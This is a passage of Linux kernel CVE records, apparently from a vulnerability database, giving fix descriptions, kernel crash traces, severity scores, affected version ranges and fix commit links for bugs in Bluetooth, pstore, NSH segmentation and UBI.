"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: Avoid potential use-after-free in hci_error_reset\n\nWhile handling the HCI_EV_HARDWARE_ERROR event, if the underlying\nBT controller is not responding, the GPIO reset mechanism would\nfree the hci_dev and lead to a use-after-free in hci_error_reset.\n\nHere\u0027s the call trace observed on a ChromeOS device with Intel AX201:\n queue_work_on+0x3e/0x6c\n __hci_cmd_sync_sk+0x2ee/0x4c0 [bluetooth \u003cHASH:3b4a6\u003e]\n ? init_wait_entry+0x31/0x31\n __hci_cmd_sync+0x16/0x20 [bluetooth \u003cHASH:3b4a 6\u003e]\n hci_error_reset+0x4f/0xa4 [bluetooth \u003cHASH:3b4a 6\u003e]\n process_one_work+0x1d8/0x33f\n worker_thread+0x21b/0x373\n kthread+0x13a/0x152\n ? pr_cont_work+0x54/0x54\n ? kthread_blkcg+0x31/0x31\n ret_from_fork+0x1f/0x30\n\nThis patch holds the reference count on the hci_dev while processing\na HCI_EV_HARDWARE_ERROR event to avoid potential crash."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:56:52.344Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/e0b278650f07acf2e0932149183458468a731c03"
},
{
"url": "https://git.kernel.org/stable/c/98fb98fd37e42fd4ce13ff657ea64503e24b6090"
},
{
"url": "https://git.kernel.org/stable/c/6dd0a9dfa99f8990a08eb8fdd8e79bee31c7d8e2"
},
{
"url": "https://git.kernel.org/stable/c/da4569d450b193e39e87119fd316c0291b585d14"
},
{
"url": "https://git.kernel.org/stable/c/45085686b9559bfbe3a4f41d3d695a520668f5e1"
},
{
"url": "https://git.kernel.org/stable/c/2ab9a19d896f5a0dd386e1f001c5309bc35f433b"
},
{
"url": "https://git.kernel.org/stable/c/dd594cdc24f2e48dab441732e6dfcafd6b0711d1"
},
{
"url": "https://git.kernel.org/stable/c/2449007d3f73b2842c9734f45f0aadb522daf592"
}
],
"title": "Bluetooth: Avoid potential use-after-free in hci_error_reset",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26801",
"datePublished": "2024-04-04T08:20:29.211Z",
"dateReserved": "2024-02-19T14:20:24.179Z",
"dateUpdated": "2025-05-04T08:56:52.344Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-35940 (GCVE-0-2024-35940)
Vulnerability from cvelistv5
Published
2024-05-19 10:10
Modified
2025-05-04 09:08
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
pstore/zone: Add a null pointer check to the psz_kmsg_read
kasprintf() returns a pointer to dynamically allocated memory
which can be NULL upon failure. Ensure the allocation was successful
by checking the pointer validity.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:21:49.063Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/98e2b97acb875d65bdfc75fc408e67975cef3041"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0ff96ec22a84d80a18d7ae8ca7eb111c34ee33bb"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/635594cca59f9d7a8e96187600c34facb8bc0682"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ec7256887d072f98c42cdbef4dcc80ddf84c7a70"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6f9f2e498eae7897ba5d3e33908917f68ff4abcc"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/98bc7e26e14fbb26a6abf97603d59532475e97f8"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-35940",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-20T15:01:33.845156Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-476",
"description": "CWE-476 NULL Pointer Dereference",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-11-05T15:42:36.316Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/pstore/zone.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "98e2b97acb875d65bdfc75fc408e67975cef3041",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "0ff96ec22a84d80a18d7ae8ca7eb111c34ee33bb",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "635594cca59f9d7a8e96187600c34facb8bc0682",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "ec7256887d072f98c42cdbef4dcc80ddf84c7a70",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "6f9f2e498eae7897ba5d3e33908917f68ff4abcc",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "98bc7e26e14fbb26a6abf97603d59532475e97f8",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/pstore/zone.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.155",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.86",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.27",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.6",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.155",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.86",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.27",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\npstore/zone: Add a null pointer check to the psz_kmsg_read\n\nkasprintf() returns a pointer to dynamically allocated memory\nwhich can be NULL upon failure. Ensure the allocation was successful\nby checking the pointer validity."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:08:52.423Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/98e2b97acb875d65bdfc75fc408e67975cef3041"
},
{
"url": "https://git.kernel.org/stable/c/0ff96ec22a84d80a18d7ae8ca7eb111c34ee33bb"
},
{
"url": "https://git.kernel.org/stable/c/635594cca59f9d7a8e96187600c34facb8bc0682"
},
{
"url": "https://git.kernel.org/stable/c/ec7256887d072f98c42cdbef4dcc80ddf84c7a70"
},
{
"url": "https://git.kernel.org/stable/c/6f9f2e498eae7897ba5d3e33908917f68ff4abcc"
},
{
"url": "https://git.kernel.org/stable/c/98bc7e26e14fbb26a6abf97603d59532475e97f8"
}
],
"title": "pstore/zone: Add a null pointer check to the psz_kmsg_read",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-35940",
"datePublished": "2024-05-19T10:10:45.582Z",
"dateReserved": "2024-05-17T13:50:33.131Z",
"dateUpdated": "2025-05-04T09:08:52.423Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-36933 (GCVE-0-2024-36933)
Vulnerability from cvelistv5
Published
2024-05-30 15:29
Modified
2025-05-04 09:12
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
nsh: Restore skb->{protocol,data,mac_header} for outer header in nsh_gso_segment().
syzbot triggered various splats (see [0] and links) by a crafted GSO
packet of VIRTIO_NET_HDR_GSO_UDP layering the following protocols:
ETH_P_8021AD + ETH_P_NSH + ETH_P_IPV6 + IPPROTO_UDP
NSH can encapsulate IPv4, IPv6, Ethernet, NSH, and MPLS. As the inner
protocol can be Ethernet, NSH GSO handler, nsh_gso_segment(), calls
skb_mac_gso_segment() to invoke inner protocol GSO handlers.
nsh_gso_segment() does the following for the original skb before
calling skb_mac_gso_segment()
1. reset skb->network_header
2. save the original skb->{mac_heaeder,mac_len} in a local variable
3. pull the NSH header
4. resets skb->mac_header
5. set up skb->mac_len and skb->protocol for the inner protocol.
and does the following for the segmented skb
6. set ntohs(ETH_P_NSH) to skb->protocol
7. push the NSH header
8. restore skb->mac_header
9. set skb->mac_header + mac_len to skb->network_header
10. restore skb->mac_len
There are two problems in 6-7 and 8-9.
(a)
After 6 & 7, skb->data points to the NSH header, so the outer header
(ETH_P_8021AD in this case) is stripped when skb is sent out of netdev.
Also, if NSH is encapsulated by NSH + Ethernet (so NSH-Ethernet-NSH),
skb_pull() in the first nsh_gso_segment() will make skb->data point
to the middle of the outer NSH or Ethernet header because the Ethernet
header is not pulled by the second nsh_gso_segment().
(b)
While restoring skb->{mac_header,network_header} in 8 & 9,
nsh_gso_segment() does not assume that the data in the linear
buffer is shifted.
However, udp6_ufo_fragment() could shift the data and change
skb->mac_header accordingly as demonstrated by syzbot.
If this happens, even the restored skb->mac_header points to
the middle of the outer header.
It seems nsh_gso_segment() has never worked with outer headers so far.
At the end of nsh_gso_segment(), the outer header must be restored for
the segmented skb, instead of the NSH header.
To do that, let's calculate the outer header position relatively from
the inner header and set skb->{data,mac_header,protocol} properly.
[0]:
BUG: KMSAN: uninit-value in ipvlan_process_outbound drivers/net/ipvlan/ipvlan_core.c:524 [inline]
BUG: KMSAN: uninit-value in ipvlan_xmit_mode_l3 drivers/net/ipvlan/ipvlan_core.c:602 [inline]
BUG: KMSAN: uninit-value in ipvlan_queue_xmit+0xf44/0x16b0 drivers/net/ipvlan/ipvlan_core.c:668
ipvlan_process_outbound drivers/net/ipvlan/ipvlan_core.c:524 [inline]
ipvlan_xmit_mode_l3 drivers/net/ipvlan/ipvlan_core.c:602 [inline]
ipvlan_queue_xmit+0xf44/0x16b0 drivers/net/ipvlan/ipvlan_core.c:668
ipvlan_start_xmit+0x5c/0x1a0 drivers/net/ipvlan/ipvlan_main.c:222
__netdev_start_xmit include/linux/netdevice.h:4989 [inline]
netdev_start_xmit include/linux/netdevice.h:5003 [inline]
xmit_one net/core/dev.c:3547 [inline]
dev_hard_start_xmit+0x244/0xa10 net/core/dev.c:3563
__dev_queue_xmit+0x33ed/0x51c0 net/core/dev.c:4351
dev_queue_xmit include/linux/netdevice.h:3171 [inline]
packet_xmit+0x9c/0x6b0 net/packet/af_packet.c:276
packet_snd net/packet/af_packet.c:3081 [inline]
packet_sendmsg+0x8aef/0x9f10 net/packet/af_packet.c:3113
sock_sendmsg_nosec net/socket.c:730 [inline]
__sock_sendmsg net/socket.c:745 [inline]
__sys_sendto+0x735/0xa10 net/socket.c:2191
__do_sys_sendto net/socket.c:2203 [inline]
__se_sys_sendto net/socket.c:2199 [inline]
__x64_sys_sendto+0x125/0x1c0 net/socket.c:2199
do_syscall_x64 arch/x86/entry/common.c:52 [inline]
do_syscall_64+0xcf/0x1e0 arch/x86/entry/common.c:83
entry_SYSCALL_64_after_hwframe+0x63/0x6b
Uninit was created at:
slab_post_alloc_hook mm/slub.c:3819 [inline]
slab_alloc_node mm/slub.c:3860 [inline]
__do_kmalloc_node mm/slub.c:3980 [inline]
__kmalloc_node_track_caller+0x705/0x1000 mm/slub.c:4001
kmalloc_reserve+0x249/0x4a0 net/core/skbuff.c:582
__
---truncated---
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: c411ed854584a71b0e86ac3019b60e4789d88086 Version: c411ed854584a71b0e86ac3019b60e4789d88086 Version: c411ed854584a71b0e86ac3019b60e4789d88086 Version: c411ed854584a71b0e86ac3019b60e4789d88086 Version: c411ed854584a71b0e86ac3019b60e4789d88086 Version: c411ed854584a71b0e86ac3019b60e4789d88086 Version: c411ed854584a71b0e86ac3019b60e4789d88086 Version: c411ed854584a71b0e86ac3019b60e4789d88086 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-36933",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-04T15:40:25.095830Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:47:53.616Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-09-12T16:02:59.824Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a7c2c3c1caabcb4a3d6c47284c397507aaf54fe9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/46134031c20fd313d03b90169d64b2e05ca6b65c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/bbccf0caef2fa917d6d0692385a06ce3c262a216"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5a4603fbc285752d19e4b415466db18ef3617e4a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/37ed6f244ec5bda2e90b085084e322ea55d0aaa2"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/696d18bb59727a2e0526c0802a812620be1c9340"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/29a07f2ee4d273760c2acbfc756e29eccd82470a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4b911a9690d72641879ea6d13cce1de31d346d79"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00019.html"
},
{
"url": "https://security.netapp.com/advisory/ntap-20240912-0006/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/nsh/nsh.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "a7c2c3c1caabcb4a3d6c47284c397507aaf54fe9",
"status": "affected",
"version": "c411ed854584a71b0e86ac3019b60e4789d88086",
"versionType": "git"
},
{
"lessThan": "46134031c20fd313d03b90169d64b2e05ca6b65c",
"status": "affected",
"version": "c411ed854584a71b0e86ac3019b60e4789d88086",
"versionType": "git"
},
{
"lessThan": "bbccf0caef2fa917d6d0692385a06ce3c262a216",
"status": "affected",
"version": "c411ed854584a71b0e86ac3019b60e4789d88086",
"versionType": "git"
},
{
"lessThan": "5a4603fbc285752d19e4b415466db18ef3617e4a",
"status": "affected",
"version": "c411ed854584a71b0e86ac3019b60e4789d88086",
"versionType": "git"
},
{
"lessThan": "37ed6f244ec5bda2e90b085084e322ea55d0aaa2",
"status": "affected",
"version": "c411ed854584a71b0e86ac3019b60e4789d88086",
"versionType": "git"
},
{
"lessThan": "696d18bb59727a2e0526c0802a812620be1c9340",
"status": "affected",
"version": "c411ed854584a71b0e86ac3019b60e4789d88086",
"versionType": "git"
},
{
"lessThan": "29a07f2ee4d273760c2acbfc756e29eccd82470a",
"status": "affected",
"version": "c411ed854584a71b0e86ac3019b60e4789d88086",
"versionType": "git"
},
{
"lessThan": "4b911a9690d72641879ea6d13cce1de31d346d79",
"status": "affected",
"version": "c411ed854584a71b0e86ac3019b60e4789d88086",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/nsh/nsh.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.14"
},
{
"lessThan": "4.14",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.314",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.276",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.217",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.159",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.91",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.31",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.10",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.314",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.276",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.217",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.159",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.91",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.31",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.10",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "4.14",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnsh: Restore skb-\u003e{protocol,data,mac_header} for outer header in nsh_gso_segment().\n\nsyzbot triggered various splats (see [0] and links) by a crafted GSO\npacket of VIRTIO_NET_HDR_GSO_UDP layering the following protocols:\n\n ETH_P_8021AD + ETH_P_NSH + ETH_P_IPV6 + IPPROTO_UDP\n\nNSH can encapsulate IPv4, IPv6, Ethernet, NSH, and MPLS. As the inner\nprotocol can be Ethernet, NSH GSO handler, nsh_gso_segment(), calls\nskb_mac_gso_segment() to invoke inner protocol GSO handlers.\n\nnsh_gso_segment() does the following for the original skb before\ncalling skb_mac_gso_segment()\n\n 1. reset skb-\u003enetwork_header\n 2. save the original skb-\u003e{mac_heaeder,mac_len} in a local variable\n 3. pull the NSH header\n 4. resets skb-\u003emac_header\n 5. set up skb-\u003emac_len and skb-\u003eprotocol for the inner protocol.\n\nand does the following for the segmented skb\n\n 6. set ntohs(ETH_P_NSH) to skb-\u003eprotocol\n 7. push the NSH header\n 8. restore skb-\u003emac_header\n 9. set skb-\u003emac_header + mac_len to skb-\u003enetwork_header\n 10. restore skb-\u003emac_len\n\nThere are two problems in 6-7 and 8-9.\n\n (a)\n After 6 \u0026 7, skb-\u003edata points to the NSH header, so the outer header\n (ETH_P_8021AD in this case) is stripped when skb is sent out of netdev.\n\n Also, if NSH is encapsulated by NSH + Ethernet (so NSH-Ethernet-NSH),\n skb_pull() in the first nsh_gso_segment() will make skb-\u003edata point\n to the middle of the outer NSH or Ethernet header because the Ethernet\n header is not pulled by the second nsh_gso_segment().\n\n (b)\n While restoring skb-\u003e{mac_header,network_header} in 8 \u0026 9,\n nsh_gso_segment() does not assume that the data in the linear\n buffer is shifted.\n\n However, udp6_ufo_fragment() could shift the data and change\n skb-\u003emac_header accordingly as demonstrated by syzbot.\n\n If this happens, even the restored skb-\u003emac_header points to\n the middle of the outer header.\n\nIt seems nsh_gso_segment() has never worked with outer headers so far.\n\nAt the end of nsh_gso_segment(), the outer header must be restored for\nthe segmented skb, instead of the NSH header.\n\nTo do that, let\u0027s calculate the outer header position relatively from\nthe inner header and set skb-\u003e{data,mac_header,protocol} properly.\n\n[0]:\nBUG: KMSAN: uninit-value in ipvlan_process_outbound drivers/net/ipvlan/ipvlan_core.c:524 [inline]\nBUG: KMSAN: uninit-value in ipvlan_xmit_mode_l3 drivers/net/ipvlan/ipvlan_core.c:602 [inline]\nBUG: KMSAN: uninit-value in ipvlan_queue_xmit+0xf44/0x16b0 drivers/net/ipvlan/ipvlan_core.c:668\n ipvlan_process_outbound drivers/net/ipvlan/ipvlan_core.c:524 [inline]\n ipvlan_xmit_mode_l3 drivers/net/ipvlan/ipvlan_core.c:602 [inline]\n ipvlan_queue_xmit+0xf44/0x16b0 drivers/net/ipvlan/ipvlan_core.c:668\n ipvlan_start_xmit+0x5c/0x1a0 drivers/net/ipvlan/ipvlan_main.c:222\n __netdev_start_xmit include/linux/netdevice.h:4989 [inline]\n netdev_start_xmit include/linux/netdevice.h:5003 [inline]\n xmit_one net/core/dev.c:3547 [inline]\n dev_hard_start_xmit+0x244/0xa10 net/core/dev.c:3563\n __dev_queue_xmit+0x33ed/0x51c0 net/core/dev.c:4351\n dev_queue_xmit include/linux/netdevice.h:3171 [inline]\n packet_xmit+0x9c/0x6b0 net/packet/af_packet.c:276\n packet_snd net/packet/af_packet.c:3081 [inline]\n packet_sendmsg+0x8aef/0x9f10 net/packet/af_packet.c:3113\n sock_sendmsg_nosec net/socket.c:730 [inline]\n __sock_sendmsg net/socket.c:745 [inline]\n __sys_sendto+0x735/0xa10 net/socket.c:2191\n __do_sys_sendto net/socket.c:2203 [inline]\n __se_sys_sendto net/socket.c:2199 [inline]\n __x64_sys_sendto+0x125/0x1c0 net/socket.c:2199\n do_syscall_x64 arch/x86/entry/common.c:52 [inline]\n do_syscall_64+0xcf/0x1e0 arch/x86/entry/common.c:83\n entry_SYSCALL_64_after_hwframe+0x63/0x6b\n\nUninit was created at:\n slab_post_alloc_hook mm/slub.c:3819 [inline]\n slab_alloc_node mm/slub.c:3860 [inline]\n __do_kmalloc_node mm/slub.c:3980 [inline]\n __kmalloc_node_track_caller+0x705/0x1000 mm/slub.c:4001\n kmalloc_reserve+0x249/0x4a0 net/core/skbuff.c:582\n __\n---truncated---"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:12:21.934Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/a7c2c3c1caabcb4a3d6c47284c397507aaf54fe9"
},
{
"url": "https://git.kernel.org/stable/c/46134031c20fd313d03b90169d64b2e05ca6b65c"
},
{
"url": "https://git.kernel.org/stable/c/bbccf0caef2fa917d6d0692385a06ce3c262a216"
},
{
"url": "https://git.kernel.org/stable/c/5a4603fbc285752d19e4b415466db18ef3617e4a"
},
{
"url": "https://git.kernel.org/stable/c/37ed6f244ec5bda2e90b085084e322ea55d0aaa2"
},
{
"url": "https://git.kernel.org/stable/c/696d18bb59727a2e0526c0802a812620be1c9340"
},
{
"url": "https://git.kernel.org/stable/c/29a07f2ee4d273760c2acbfc756e29eccd82470a"
},
{
"url": "https://git.kernel.org/stable/c/4b911a9690d72641879ea6d13cce1de31d346d79"
}
],
"title": "nsh: Restore skb-\u003e{protocol,data,mac_header} for outer header in nsh_gso_segment().",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-36933",
"datePublished": "2024-05-30T15:29:23.764Z",
"dateReserved": "2024-05-30T15:25:07.071Z",
"dateUpdated": "2025-05-04T09:12:21.934Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-25739 (GCVE-0-2024-25739)
Vulnerability from cvelistv5
Published
2024-02-12 00:00
Modified
2025-03-14 18:24
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
create_empty_lvol in drivers/mtd/ubi/vtbl.c in the Linux kernel through 6.7.4 can attempt to allocate zero bytes, and crash, because of a missing check for ubi->leb_size.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-01T23:52:04.926Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://www.spinics.net/lists/kernel/msg5074816.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://groups.google.com/g/syzkaller/c/Xl97YcQA4hg"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=68a24aba7c593eafa8fd00f2f76407b9b32b47a9"
},
{
"name": "[debian-lts-announce] 20240625 [SECURITY] [DLA 3842-1] linux-5.10 security update",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"name": "[debian-lts-announce] 20240627 [SECURITY] [DLA 3840-1] linux security update",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
